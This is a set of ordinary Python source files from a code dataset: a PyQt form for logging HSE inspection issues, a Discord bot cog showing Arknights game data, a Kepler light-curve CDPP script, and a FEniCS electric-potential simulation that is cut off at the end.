self.inspectedDepartmentEntry = QComboBox()\n self.inspectedDepartmentEntry.setEditable(True)\n self.inspectedContractorEntry = QComboBox()\n self.inspectedContractorEntry.setEditable(True)\n self.inspectedSubcontractorEntry = QComboBox()\n self.inspectedSubcontractorEntry.setEditable(True)\n self.deadlineEntry = QDateTimeEdit()\n self.deadlineEntry.setDateTime(QDateTime.currentDateTime())\n\n # Bottom layout widgets\n self.attachFilesBtn = QPushButton(\"Attach files\")\n self.addActionBtn = QPushButton(\"Add action\")\n\n self.rootCauseEntry = QComboBox()\n self.rootCauseEntry.setEditable(True)\n self.rootCauseDetailsEntry = QTextEdit()\n self.rootCauseActionPartyEntry = QComboBox()\n self.rootCauseActionPartyEntry.setEditable(True)\n self.addRootCauseBtn = QPushButton(\"Add root cause\")\n\n self.submitObservationBtn = QPushButton(\"Add issue\")\n self.submitObservationBtn.clicked.connect(self.addIssue)\n\n def layouts(self):\n self.mainLayout = QVBoxLayout()\n self.topLayout = QHBoxLayout()\n self.bottomLayout = QFormLayout()\n\n # Put elements into frames for visual distinction\n self.topFrame = QFrame()\n self.bottomFrame = QFrame()\n\n # Add widgets to top layout\n self.topLayout.addWidget(self.addIssueImg)\n self.topLayout.addWidget(self.titleText)\n\n self.topFrame.setLayout(self.topLayout)\n\n # Add widgets to middle layout\n self.bottomLayout.addRow(self.issueInfoTitleText)\n self.bottomLayout.addRow(QLabel(\"Inspection Date: \"), self.dateEntry)\n self.bottomLayout.addRow(QLabel(\"Priority: \"), self.priorityEntry)\n self.bottomLayout.addRow(QLabel(\"Observer: \"), self.observerEntry)\n self.bottomLayout.addRow(QLabel(\"Revision Team: \"), self.revisionTeamEntry)\n self.bottomLayout.addRow(QLabel(\"Inspection Name: \"), self.inspectionNameEntry)\n self.bottomLayout.addRow(QLabel(\"HSE Theme: \"), self.observationThemeEntry)\n self.bottomLayout.addRow(QLabel(\"Facility: \"), self.facilityEntry)\n self.bottomLayout.addRow(QLabel(\"Facility supervisor: \"), self.facilitySupervisorEntry)\n self.bottomLayout.addRow(QLabel(\"Specific location: \"), self.specificLocationEntry)\n 
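\n        # Rows below capture which department, contractor and subcontractor were inspected.\n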
self.bottomLayout.addRow(QLabel(\"Inspected department: \"), self.inspectedDepartmentEntry)\n self.bottomLayout.addRow(QLabel(\"Inspected contractor: \"), self.inspectedContractorEntry)\n self.bottomLayout.addRow(QLabel(\"Inspected subcontractor: \"), self.inspectedSubcontractorEntry)\n self.bottomLayout.addRow(QLabel(\"Deadline: \"), self.deadlineEntry)\n\n self.bottomLayout.addRow(QLabel(\"\"), self.attachFilesBtn)\n self.bottomLayout.addRow(QLabel(\"\"), self.addActionBtn)\n\n self.bottomLayout.addRow(QLabel(\"\"), self.addRootCauseBtn)\n self.bottomLayout.addRow(QLabel(\"\"), self.submitObservationBtn)\n\n self.bottomFrame.setLayout(self.bottomLayout)\n\n # Make bottom frame scollable\n self.scroll.setWidget(self.bottomFrame)\n\n # Add frames to main layout\n self.mainLayout.addWidget(self.topFrame)\n self.mainLayout.addWidget(self.scroll)\n\n self.setLayout(self.mainLayout)\n\n def addIssue(self):\n date = self.dateEntry.text()\n priority = self.priorityEntry.currentText()\n observer = self.observerEntry.currentText()\n revisionTeam = self.revisionTeamEntry.currentText()\n inspectionName = self.inspectionNameEntry.currentText()\n observationTheme = self.observationThemeEntry.currentText()\n facility = self.facilityEntry.currentText()\n facilitySupervisor = self.facilitySupervisorEntry.currentText()\n specificLocation = self.specificLocationEntry.toPlainText()\n inspectedDept = self.inspectedDepartmentEntry.currentText()\n inspectedContr = self.inspectedContractorEntry.currentText()\n inspectedSubcontr = self.inspectedSubcontractorEntry.currentText()\n deadline = self.deadlineEntry.text()\n\n if date and priority and observer and revisionTeam and inspectionName and observationTheme and facility\\\n and facilitySupervisor and specificLocation and inspectedDept and inspectedContr \\\n and inspectedSubcontr and deadline != \"\":\n try:\n query = \"INSERT INTO issues (issue_date, issue_priority, issue_observer, issue_team,\" \\\n \"issue_inspection, issue_theme, issue_facility, issue_fac_supervisor,\" \\\n \"issue_spec_loc, issue_insp_dept, issue_insp_contr, issue_insp_subcontr, issue_deadline, created_on) \" \\\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n\n # The purpose of this block is to make created_on timestamp the same format as other dates\n currentTime = QDateTimeEdit()\n currentTime.setDateTime(QDateTime.currentDateTime())\n now = currentTime.text()\n\n db.cur.execute(query, (date, priority, observer, revisionTeam, inspectionName, observationTheme,\n facility, facilitySupervisor, specificLocation, inspectedDept, inspectedContr,\n inspectedSubcontr, deadline, now))\n db.conn.commit()\n\n QMessageBox.information(self, \"Info\", \"Issue has been added\")\n\n self.Parent.displayIssues()\n self.close()\n except:\n QMessageBox.information(self, \"Info\", \"Issue has not been added\")\n else:\n QMessageBox.information(self, \"Info\", \"Fields cannot be empty\")\n\n\n","sub_path":"SR/add_issue.py","file_name":"add_issue.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"543159595","text":"import logging\nimport re\nfrom itertools import combinations\n\nfrom discord import Embed\nfrom discord.ext import commands\n\nfrom amiya.utils import arknights, constants, discord_common\n\n\nclass GeneralCogError(commands.CommandError):\n pass\n\n\nclass General(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(brief=\"Shows infos of a stage\", 
usage=\"[stage]\")\n async def stage(self, ctx, *stage: str):\n \"\"\"\n Detailed information of a stage\n\n E.g: ;stage 4-7\n \"\"\"\n\n if stage is None:\n raise GeneralCogError(\"You need to provide a stage name or id!\")\n\n # Get stage info\n info, extra_info, anni_info = arknights.get_stage(stage)\n\n title = f'[{info[\"code\"]}] {info[\"name\"]} {\"(Challenge Mode)\" if \"+cm\" in stage else \"\"}'\n\n # Check if stage is boss stage\n if info[\"bossMark\"] is True:\n title += \" (Boss Stage)\"\n\n # Regex for stuffs like <@lv.item>\n pattern = re.compile(r\"<@.+?>(]*>?)\", re.DOTALL)\n description = pattern.sub(r\"**\\1**\", info[\"description\"])\n\n embed = Embed(\n title=title,\n description=f'Recommend Operator Lv. **[{info[\"dangerLevel\"]}]**\\n{description}',\n )\n\n # General info\n general = \"\"\n if anni_info is None:\n general += f'• Sanity Cost : {info[\"apCost\"]}\\n• Practice Ticket Cost : {max(0, info[\"practiceTicketCost\"])}\\n• EXP Gain : {info[\"expGain\"]}\\n• LMD Gain : {info[\"goldGain\"]}\\n• Favor Gain : {info[\"completeFavor\"]}'\n if len(info[\"unlockCondition\"]) > 0:\n unlock_condition = [\n f'{\"Clear\" if st[\"completeState\"] == 2 else \"Perfect\"} **{arknights.get_stage(st[\"stageId\"])[0][\"code\"]}**' for st in info[\"unlockCondition\"]]\n general += f'\\n• Unlock Conditions : {\", \".join(unlock_condition)}'\n if info[\"slProgress\"] > 0:\n general += f'\\n• Storyline Progress : {info[\"slProgress\"]}%'\n embed.add_field(name=\"General Information\",\n value=general, inline=False)\n\n # Challenge Mode info\n if info[\"hardStagedId\"] is not None:\n challenge_mode = arknights.get_stage(info[\"hardStagedId\"])[0]\n challenge_general = \"\"\n if len(challenge_mode[\"unlockCondition\"]) > 0:\n unlock_condition = [\n f'{\"Clear\" if st[\"completeState\"] == 2 else \"Perfect\"} **{arknights.get_stage(st[\"stageId\"])[0][\"code\"]}**' for st in challenge_mode[\"unlockCondition\"]]\n challenge_general += f'• Unlock Conditions : {\", \".join(unlock_condition)}'\n challenge_description = pattern.sub(\n r\"**\\1**\", challenge_mode[\"description\"])\n embed.add_field(name=\"Challenge Mode Information\",\n value=f'{challenge_description}\\n{challenge_general}', inline=False)\n\n # Map info\n extra_options = extra_info[\"options\"]\n stage_info = f'• Deployment Limit : {extra_options[\"characterLimit\"]}\\n• Life Points : {extra_options[\"maxLifePoint\"]}\\n• Initial DP : {extra_options[\"initialCost\"]}'\n embed.add_field(name=\"Map Information\", value=stage_info, inline=False)\n\n # Enemies info\n # Count enemies by extracting waves\n # I can't really find a better way to do this, maybe the database is missing some parts ?\n enemies_waves = extra_info[\"waves\"]\n enemies_count = {}\n for wave in enemies_waves:\n for fragment in wave[\"fragments\"]:\n for action in fragment[\"actions\"]:\n if action[\"actionType\"] == 0:\n enemy = arknights.get_enemy(action[\"key\"])\n if enemy[\"name\"] not in enemies_count:\n enemies_count[enemy[\"name\"]] = {\n \"sort\": enemy[\"sortId\"],\n \"count\": 0\n }\n enemies_count[enemy[\"name\"]\n ][\"count\"] += action[\"count\"]\n enemies_count = {k: v for k, v in sorted(\n enemies_count.items(), key=lambda item: item[1][\"sort\"])}\n embed.add_field(name=\"Enemies\", value=\"\\n\".join(\n [f'• {enemy[1][\"count\"]}x {enemy[0]}' for enemy in enemies_count.items()]), inline=False)\n\n # Filter Originite Prime\n first = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in 
info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 8 # First clear item (Originite Prime)\n ]\n ]\n # Filter items\n first.extend(\n [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 # First clear (others)\n and y[\"type\"] != \"TKT_RECRUIT\" # Operator\n and y[\"type\"] != \"FURN\" # Furniture\n ]\n ]\n )\n # Filter operator\n first.extend(\n [\n f'• {x[\"name\"]}'\n for x in [\n arknights.get_operator_info(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 and y[\"type\"] == \"TKT_RECRUIT\" # Operator\n ]\n ]\n )\n # Filter furniture\n first.extend(\n [\n f'• {x[\"name\"]}'\n for x in [\n arknights.get_furniture(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 and y[\"type\"] == \"FURN\" # Furniture\n ]\n ]\n )\n # Always check for length\n if len(first) > 0:\n embed.add_field(\n name=\"First Clear\",\n value=\"\\n\".join(first),\n inline=False)\n\n # Filter regular drops\n regular = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 2 # Fixed\n ]\n ]\n # Always check for length\n if len(regular) > 0:\n embed.add_field(\n name=\"Regular Drops\", value=\"\\n\".join(regular), inline=False\n )\n\n # Filter special drops\n special = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 3 # Special Drops\n ]\n ]\n # Always check for length\n if len(special) > 0:\n embed.add_field(\n name=\"Special Drops\", value=\"\\n\".join(special), inline=False\n )\n\n # Filter extra drops\n extra = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayDetailRewards\"]\n if y[\"dropType\"] == 4 # Extra Drops\n ]\n ]\n # Always check for length\n if len(extra) > 0:\n embed.add_field(\n name=\"Extra Drops (Small Chance)\",\n value=\"\\n\".join(extra),\n inline=False)\n\n # Annihilatio\n if anni_info is not None:\n # First clear rewards\n first_clear = anni_info[\"breakLadders\"]\n endl = \"\\n\" # Backslashes may not appear inside the expression portions of f-strings\n embed.add_field(name=\"First Clear\", value=endl.join(\n [f'''**{ladder[\"killCnt\"]}** kills\\n{endl.join([f\"• {reward['count']} {arknights.get_item(reward['id'])['name']} (`{reward['id']}`)\" for reward in ladder[\"rewards\"]])}{f\"{endl}• Weekly Orundum Reward Limit : +{ladder['breakFeeAdd']}\" if ladder[\"breakFeeAdd\"] > 0 else \"\"}''' for ladder in first_clear]), inline=False)\n # Sanity Return Rule\n gain_ladder = anni_info[\"gainLadders\"]\n embed.add_field(name=\"Sanity Return Rule\", value=\"\\n\".join(\n [f'**{ladder[\"killCnt\"]}** kills\\n• Sanity Refund : {ladder[\"apFailReturn\"]}\\n• EXP Gain : {ladder[\"expGain\"]}\\n• LMD Gain : {ladder[\"goldGain\"]}\\n• Favor Gain : {ladder[\"favor\"]}' for ladder in gain_ladder]), inline=False)\n\n # Unreliable image source\n # https://gamepress.gg/arknights/database/combat-operation-list\n embed.set_image(\n url=f'https://gamepress.gg/arknights/sites/arknights/files/game-images/mission_maps/{info[\"stageId\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of an item\", usage=\"[item]\")\n async def item(self, ctx, *, item=None):\n 
\"\"\"\n Detailed information of an item\n\n E.g: ;info Originite Prime\n \"\"\"\n\n if item is None:\n raise GeneralCogError(\"You need to provide an item name!\")\n\n # Get item info\n info = arknights.get_item(item)\n\n embed = Embed(\n title=f'{info[\"name\"]} (`{info[\"itemId\"]}`)',\n description=f'{info[\"usage\"]}\\n_{info[\"description\"]}_\\n**Rarity** : {\"☆\" * (info[\"rarity\"] + 1)}\\n**How to obtain** : {info[\"obtainApproach\"] or \"\"}',\n )\n\n # Get stages in stage drop list\n # stages = [\n # f'• **[{x[\"code\"]}]** {x[\"name\"]}{\" (Challenge Mode)\" if x[\"difficulty\"] == \"FOUR_STAR\" else \"\"} [{constants.OCCURRENCE[y[\"occPer\"]]}]'\n # for x, y in [\n # (arknights.get_stage(y[\"stageId\"])[0], y) for y in info[\"stageDropList\"]\n # ]\n # ]\n\n # Get stages directly\n stages = [\n f'• **[{x[\"code\"]}]** {x[\"name\"]}{\" (Challenge Mode)\" if x[\"difficulty\"] == \"FOUR_STAR\" else \"\"} [{constants.DROP_TYPE[y][1 if info[\"rarity\"] > 1 and y == 2 else 0]}]'\n for x, y in arknights.get_stage_with_item(\n info[\"itemId\"]\n ) # Get stage list with item\n if y != 4 # Don't get stage where item is extra drop\n ]\n if len(\n stages) > 0 and info[\"itemId\"] != \"4002\": # Filter Originite Prime\n embed.add_field(name=\"Stages\", value=\"\\n\".join(stages))\n\n # If item can be produced in base\n base = [\n f'• {x[\"roomType\"].title()}' for x in info[\"buildingProductList\"]]\n # Always check for length\n if len(base) > 0:\n embed.add_field(name=\"Base production\", value=\"\\n\".join(base))\n\n # Get item image from\n # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n embed.set_thumbnail(\n url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/items/{info[\"iconId\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of a furniture\", usage=\"[furniture]\")\n async def furniture(self, ctx, *, furniture=None):\n \"\"\"\n Detailed infos of a furniture\n\n E.g: ;furniture Rabbit-like Bean Bag Sofa\n \"\"\"\n\n if furniture is None:\n raise GeneralCogError(\"You need to provide a furniture name!\")\n\n # Get furniture info\n info = arknights.get_furniture(furniture)\n embed = Embed(\n title=info[\"name\"],\n description=f'{info[\"usage\"]}\\n_{info[\"description\"]}_\\n**Rarity** : {\"☆\" * (info[\"rarity\"] + 1)}\\n**How to obtain** : {info[\"obtainApproach\"] or \"\"}',\n )\n\n # Grab general\n general = f'• Type : {info[\"type\"].title()}\\n• Location : {info[\"location\"].title()}\\n• Category : {info[\"category\"].title()}'\n embed.add_field(name=\"Details\", value=general, inline=False)\n\n # Add measurements\n measurements = f'• Width : {info[\"width\"]}\\n• Depth : {info[\"depth\"]}\\n• Height : {info[\"height\"]}\\n• Ambience : {info[\"comfort\"]}'\n embed.add_field(name=\"Measurements\", value=measurements, inline=False)\n\n # Get furniture image from\n # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n embed.set_thumbnail(\n url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/furniture/{info[\"id\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of an enemy\", usage=\"[enemy]\")\n async def enemy(self, ctx, *, enemy=None):\n \"\"\"\n Detailed infos of an enemy\n\n E.g: ;enemy FrostNova\n \"\"\"\n\n if enemy is None:\n raise GeneralCogError(\"You need to provide an enemy name!\")\n\n # Get enemy info\n info = arknights.get_enemy(enemy)\n\n description = \"\"\n # Enemy races: Infected Creature, Sarkaz, etc\n if info[\"enemyRace\"] is not None:\n 
            description += f'**Race** : {info[\"enemyRace\"] or \"???\"}\\n'\n        # Attack types: Melee, Ranged, Ranged Arts, etc\n        description += f'''**Attack** : {info[\"attackType\"]}\\n{info[\"description\"]}'''\n        embed = Embed(\n            title=f'[{info[\"enemyIndex\"]}] {info[\"name\"]}',\n            description=description)\n\n        # Stats\n        embed.add_field(\n            name=\"Stats\",\n            value=f'• HP : {info[\"endure\"]}\\n• ATK : {info[\"attack\"]}\\n• DEF : {info[\"defence\"]}\\n• RES : {info[\"resistance\"]}',\n            inline=False,\n        )\n\n        # Ability: \"Upon death, deals large physical damage in an area\", etc\n        if info[\"ability\"] is not None:\n            embed.add_field(\n                name=\"Ability\",\n                value=info[\"ability\"],\n                inline=False)\n\n        # Get enemy image from\n        # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n        embed.set_thumbnail(\n            url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/enemy/{info[\"enemyId\"]}.png')\n\n        await ctx.send(embed=embed)\n\n    @commands.command(\n        brief=\"Shows which operators you can get with which tags\",\n        usage=\"[tags]\")\n    async def recruit(self, ctx, *tags):\n        \"\"\"\n        Shows which operators you can get with which recruitment tags\n        Multi-word tags have to be quoted\n\n        E.g: ;recruit Defense Melee \"Crowd Control\" \"Top Operator\" \"Senior Operator\"\n        \"\"\"\n\n        tags = list(tags)\n        # Check number of tags\n        if len(tags) == 0 or len(tags) > 5:\n            raise GeneralCogError(\n                \"You have to provide at least 1 tag and at most 5 tags!\"\n            )\n        # Check for invalid tags\n        if set(tags).issubset(constants.TAG_LIST) is False:\n            raise GeneralCogError(\n                f'Tag must be one of {\", \".join(constants.TAG_LIST)}')\n\n        # Generate tag combinations\n        tags_combi = [\n            combi\n            for combi_list in [\n                [list(x) for x in combinations(tags, i)] for i in range(1, 4)\n            ]\n            for combi in combi_list\n        ][::-1]\n\n        # Create a match table\n        match_table = [[] for _ in range(len(tags_combi))]\n        embed = Embed()\n        # Get operator list\n        operator_list = arknights.get_operator_by_tags(\n            [x.lower() for x in tags])\n\n        for (tag_combi, match_list) in zip(tags_combi, match_table):\n            # Adding operators\n            match_list.extend(\n                [\n                    (operator[\"name\"], operator[\"rarity\"] + 1)\n                    for operator in operator_list\n                    # Check if operator tag list has tag combinations\n                    if (set(tag_combi).issubset(set(operator[\"tagList\"])))\n                    # Only show 6* if \"Top Operator\" is in query\n                    and not (\n                        \"Top Operator\" not in tags\n                        and \"Top Operator\" in operator[\"tagList\"]\n                    )\n                ][::-1]\n            )\n\n            # If match found\n            if len(match_list) > 0:\n                embed.add_field(\n                    name=\" \".join(tag_combi),\n                    value=f'{\" \".join([f\"`[{op[1]}☆] {op[0]}`\" for op in match_list])}',\n                    inline=False,\n                )\n\n        await ctx.send(embed=embed)\n\n    @commands.command(brief=\"Shows some tips\", usage=\"[category]\")\n    async def tip(self, ctx, *, category=None):\n        \"\"\"\n        Display a random (useful) tip\n        \"\"\"\n\n        # Category list to filter\n        categories = [\"BATTLE\", \"BUILDING\", \"GACHA\", \"MISC\"]\n        # Filter invalid category\n        if category is None or category.upper() not in categories:\n            raise GeneralCogError(\n                f'Category must be one of {\", \".join([x.title() for x in categories])}'\n            )\n\n        # Get random tip\n        info = arknights.get_tips(category)\n\n        embed = Embed(description=f'**[{info[\"category\"]}]** {info[\"tip\"]}.')\n\n        await ctx.send(embed=embed)\n\n    @discord_common.send_error_if(GeneralCogError)\n    async def cog_command_error(self, ctx, error):\n        logging.exception(error)\n\n\ndef setup(bot):\n
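    # Entry point used by discord.py's extension loader (bot.load_extension).\n    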
bot.add_cog(General(bot))\n","sub_path":"amiya/cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":17396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204956028","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nkepler_cdpp.py\n--------------\n\nComputes the raw 6-hr CDPP for all original `Kepler` targets.\n\n..warning:: This was copied over from an older version, and may need to be tweaked slightly.\n\n'''\n\nfrom __future__ import division, print_function, absolute_import, unicode_literals\nimport os, sys\nEVEREST_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.insert(1, EVEREST_ROOT)\nimport everest\nfrom everest.utils import RMS\nimport kplr\nfrom kplr.config import KPLR_ROOT\nimport random\nimport numpy as np\nimport shutil\nimport subprocess\nimport warnings\nfrom urllib.error import HTTPError\nfrom scipy.signal import savgol_filter\n\n# Start up kplr\nclient = kplr.API()\n\n# Get all stars\nstars = list(np.loadtxt(os.path.join(EVEREST_ROOT, 'tables', 'keplerstars.csv'), dtype = int)) \nnstars = len(stars)\n\n# Remove ones we've done\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n done = np.loadtxt(os.path.join('CDPP', 'kepler.tsv'), dtype = float)\nif len(done):\n done = [int(s) for s in done[:,0]]\nstars = list(set(stars) - set(done))\nn = len(done) + 1\n\n# Open the output file\nwith open(os.path.join('CDPP', 'kepler.tsv'), 'a') as outfile:\n\n # Loop over all to get the CDPP\n for star in stars:\n\n # Progress\n sys.stdout.write('\\rRunning target %d/%d...' % (n, nstars))\n sys.stdout.flush()\n n += 1\n \n # Get the cdpp\n try:\n s = kplr.K2SFF(star)\n except (HTTPError, TypeError, ValueError):\n continue\n \n # Get a random quarter\n lc = random.choice(s.get_light_curves(short_cadence = False))\n \n # Extract the timeseries\n with lc.open() as infile:\n time = infile[1].data.field('TIME')\n flux = infile[1].data.field('SAP_FLUX')\n bad = np.where(np.isnan(time) | np.isnan(flux))\n time = np.delete(time, bad)\n flux = np.delete(flux, bad)\n \n rms = RMS(flux / np.median(flux), remove_outliers = True)\n flux_sv2 = flux - savgol_filter(flux, 49, 2) + np.median(flux)\n rms_sv2 = RMS(flux_sv2 / np.nanmedian(flux_sv2), remove_outliers = True) \n print(\"{:>09d} {:>15.3f} {:>15.3f}\".format(star, rms, rms_sv2), file = outfile)\n \n # Delete the lightcurve on disk\n shutil.rmtree(os.path.join(kplr.config.KPLR_ROOT, 'data', 'lightcurves', '%09d' % star))","sub_path":"paper/scripts/kepler_cdpp.py","file_name":"kepler_cdpp.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409273501","text":"import os\nfrom os.path import join\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"AGG\")\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport dolfin as df\n\neps = 1e-9\n\n# Define set up, corresponding semi infinite homogeneous conductor, to be compared to known analytic solution\ndx_tunnel = 100.0 # um\ndy_tunnel = 100.0\ndz_tunnel = 100.0\n\nx0 = -dx_tunnel / 2\ny0 = -dy_tunnel / 2\nz0 = 0.0\n\nx1 = x0 + dx_tunnel\ny1 = y0 + dy_tunnel\nz1 = z0 + dz_tunnel\n\nnx = 50 # Number of points in mesh. 
Larger number gives more accuracy, but is computationally demanding\nny = 50\nnz = 50\n\nsigma = 0.3 # Extracellular conductivity (S/m)\n\n\nout_folder = 'results_control'\nsim_name = \"tunnel_test\"\nfem_fig_folder = \"fem_figs_control\"\n[os.makedirs(f, exist_ok=True) for f in [out_folder, fem_fig_folder]]\n\n# example values for validation\nsource_pos = np.array([[-5, 0, 5],\n [5, 0, 5]])\nimem = np.array([[-1.0], [1.0]])\ntvec = np.array([0.])\nnum_tsteps = imem.shape[1]\nnum_sources = source_pos.shape[0]\n\n\ndef analytic_mea(x, y, z):\n phi = 0\n for idx in range(len(imem)):\n r = np.sqrt((x - source_pos[idx, 0])**2 +\n (y - source_pos[idx, 1])**2 +\n (z - source_pos[idx, 2])**2)\n phi += imem[idx] / (2 * sigma * np.pi * r)\n return phi\n\n\ndef plot_FEM_results(phi, t_idx):\n \"\"\" Plot the set-up, transmembrane currents and electric potential\n \"\"\"\n\n x = np.linspace(x0, x1, nx)\n z = np.linspace(z0, z1, nz)\n y = np.linspace(y0, y1, nz)\n\n mea_x_values = np.zeros(len(x))\n analytic = np.zeros(len(x))\n for idx in range(len(x)):\n mea_x_values[idx] = phi(x[idx], 0, eps)\n analytic[idx] = analytic_mea(x[idx], 0, 1e-9)\n\n phi_plane_xz = np.zeros((len(x), len(z)))\n phi_plane_xy = np.zeros((len(x), len(z)))\n for x_idx in range(len(x)):\n for z_idx in range(len(z)):\n phi_plane_xz[x_idx, z_idx] = phi(x[x_idx], 0.0, z[z_idx])\n for y_idx in range(len(y)):\n phi_plane_xy[x_idx, y_idx] = phi(x[x_idx], y[y_idx], 0.0 + eps)\n\n plt.close(\"all\")\n fig = plt.figure(figsize=[18, 9])\n fig.subplots_adjust(hspace=0.9, bottom=0.07, top=0.97, left=0.2)\n\n ax_setup = fig.add_subplot(511, aspect=1, xlabel='x [$\\mu$m]', ylabel='z [$\\mu$m]',\n title='Axon (green) and tunnel (gray)', xlim=[x0 - 5, x1 + 5], ylim=[z0 - 5, z1 + 5])\n\n axon_center_idx = np.argmin(np.abs(source_pos[:, 0] - 0))\n\n imem_max = np.max(np.abs(imem))\n ax_imem_temporal = fig.add_axes([0.05, 0.8, 0.08, 0.1], xlabel='Time [ms]', ylabel='nA',\n xlim=[0, tvec[-1]], ylim=[-imem_max, imem_max],\n title='Transmembrane currents\\n(x=0)')\n\n ax_imem_spatial = fig.add_subplot(512, xlabel=r'x [$\\mu$m]', ylabel='nA',\n ylim=[-imem_max - 1, imem_max + 1],\n title='Transmembrane currents across axon', xlim=[x0 - 5, x1 + 5])\n\n ax1 = fig.add_subplot(513, aspect=1, xlabel=r'x [$\\mu$m]', ylabel=r'y [$\\mu$m]',\n title='Potential cross section (z=0)')\n\n ax2 = fig.add_subplot(514, aspect=1, xlabel=r'x [$\\mu$m]', ylabel=r'z [$\\mu$m]',\n title='Potential cross section (y=0)')\n\n ax3 = fig.add_subplot(515, xlabel=r'x [$\\mu$m]', ylabel='MEA potential (mV)',\n xlim=[x0 - 5, x1 + 5])\n\n # Draw set up with tunnel and axon\n rect = mpatches.Rectangle([x0, z0], dx_tunnel, dz_tunnel, ec=\"k\", fc='0.8')\n ax_setup.add_patch(rect)\n\n ax_setup.plot(source_pos[:, 0], source_pos[:, 2], c='g', lw=2)\n ax_imem_temporal.plot(tvec, imem[axon_center_idx, :])\n ax_imem_temporal.axvline(tvec[t_idx], c='gray', ls=\"--\")\n\n ax_imem_spatial.plot(source_pos[:, 0], imem[:, t_idx])\n\n img1 = ax1.imshow(phi_plane_xy.T, interpolation='nearest', origin='lower', cmap='bwr',\n extent=(x[0], x[-1], y[0], y[-1]))\n img2 = ax2.imshow(phi_plane_xz.T, interpolation='nearest', origin='lower', cmap='bwr',\n extent=(x[0], x[-1], z[0], z[-1]))\n\n cax = fig.add_axes([0.95, 0.5, 0.01, 0.1])\n\n plt.colorbar(img1, cax=cax, label=\"mV\")\n l, = ax3.plot(x, mea_x_values, lw=2, c='k')\n la, = ax3.plot(x, analytic, lw=1, c='r', ls=\"--\")\n fig.legend([l, la], [\"FEM\", \"Analytic semi-infinite\"], frameon=False)\n plt.savefig(join(fem_fig_folder, 
'results_{}_t_idx_{}.png'.format(sim_name, t_idx)))\n\n\ndef refine_mesh(mesh):\n    \"\"\" To refine selected parts of the mesh. \"\"\"\n    for r in [2.5]:  # [20, 15, 10, 8]:\n        print(\"Refining ...\")\n        cell_markers = df.MeshFunction(\"bool\", mesh, dim=mesh.topology().dim())\n        cell_markers.set_all(False)\n        for cell in df.cells(mesh):\n            # p = np.sum(np.array(cell.midpoint()[:])**2)\n            if np.abs(cell.midpoint()[2]) < r:\n                cell_markers[cell] = True\n        mesh = df.refine(mesh, cell_markers)\n\n        print(mesh.num_cells())\n    mesh.smooth()\n    return mesh\n\n\n# Create classes for defining parts of the boundaries and the interior\n# of the domain\nclass LeftTunnel(df.SubDomain):\n    def inside(self, x, on_boundary):\n        return df.near(x[0], x0)\n\n\nclass RightTunnel(df.SubDomain):\n    def inside(self, x, on_boundary):\n        return df.near(x[0], x1)\n\n\n# Initialize sub-domain instances\nleft = LeftTunnel()\nright = RightTunnel()\n\n# Define mesh\nmesh = df.BoxMesh(df.Point(x0, y0, z0), df.Point(x1, y1, z1), nx, ny, nz)\n\nprint(\"Number of cells in mesh: \", mesh.num_cells())\n# mesh = refine_mesh(mesh)\n\nnp.save(join(out_folder, \"mesh_coordinates.npy\"), mesh.coordinates())\n\n\n# Initialize mesh function for interior domains\ndomains = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim())\ndomains.set_all(0)\n\n# Initialize mesh function for boundary domains.\nboundaries = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim()-1)\nboundaries.set_all(0)\nleft.mark(boundaries, 1)  # Mark ends of tunnel to enforce ground\nright.mark(boundaries, 1)\n\n\n# Define function space and basis functions\nV = df.FunctionSpace(mesh, \"CG\", 2)\nds = df.Measure(\"ds\", domain=mesh, subdomain_data=boundaries)\ndx = df.Measure(\"dx\", domain=mesh, subdomain_data=domains)\n\nv = df.TestFunction(V)\nu = df.TrialFunction(V)\na = df.inner(sigma * df.grad(u), df.grad(v)) * dx\n\n# This corresponds to Neumann boundary conditions zero, i.e. all outer boundaries are insulating.\nL = df.Constant(0) * v * dx\n\n# Define Dirichlet boundary conditions at left and right boundaries\nbcs = [df.DirichletBC(V, 0.0, 